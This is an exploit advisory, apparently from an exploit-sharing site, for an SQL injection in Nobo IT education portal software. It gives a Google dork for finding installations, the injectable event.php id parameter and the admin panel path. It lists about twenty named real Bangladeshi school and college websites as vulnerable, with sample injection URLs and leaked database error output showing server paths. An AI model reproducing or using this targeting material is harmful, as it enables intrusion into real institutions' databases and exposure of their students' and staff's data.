facebook facebook twitter rss

Powered By Nobo IT Software Company Bangladesh Education Portals SQL Injection Vulnerability

Author: KingSkrupellos , Published: 11-10-2018
# Exploit Title : Powered By Nobo IT Software Company Bangladesh Education Portals SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Vendor Homepage : noboit.com
# Tested On : Windows
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
# CXSecurity : cxsecurity.com/ascii/WLB-2018090024
# Cyberizm : cyberizm.org/cyberizm-powered-by-nobo-it-software-company-bd-sql-injection.html

#################################################################################################

# Google Dork : intext:''Powered by : Nobo IT.'' site:edu.bd

# Exploit : /PATH/event.php?id=[SQL Injection]

# Admin Control Panel Path => /school_admin/

#################################################################################################

# Example Vulnerable Sites =>

suc.edu.bd/old/event.php?id=14%27 => [ Proof of Concept ] => archive.is/9N6hJ

mohanpurphs.edu.bd/old/event.php?id=7%27

guimaracollege.edu.bd

szmc.edu.bd

dhssp.edu.bd

bmihs.edu.bd

nrpghs.edu.bd

bhuapurphgs.edu.bd

sutihsshighschool.edu.bd

kumradidufm.edu.bd

mdm.edu.bd

syednagararhs.edu.bd

dzkdc.edu.bd

kaptaihighschool.edu.bd

bhuapurmphs.edu.bd

mckam.edu.bd

tokesghs.edu.bd

trhs.edu.bd

jzahs.edu.bd

kapaleswarhs.edu.bd

gfam.edu.bd

# SQL Database Error =>

Warning: mysql_fetch_array() expects parameter 1 to be resource,
boolean given in /home/mohanpurphsedu/public_html/old/event.php on line 10

Warning: mysql_fetch_array() expects parameter 1 to be resource,
boolean given in /home/sucedu/public_html/old/event.php on line 32

A Database Error Occurred
Error Number: 1

Can't create/write to file '/tmp/#sql_c3e_0.MYI' (Errcode: 122 - Internal (unspecified) error in handler)

SHOW COLUMNS FROM `admin`

Filename: /home/dzkdcedu/public_html/core/MY_Model.php

Line Number: 40

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

#################################################################################################

Like us on Facebook :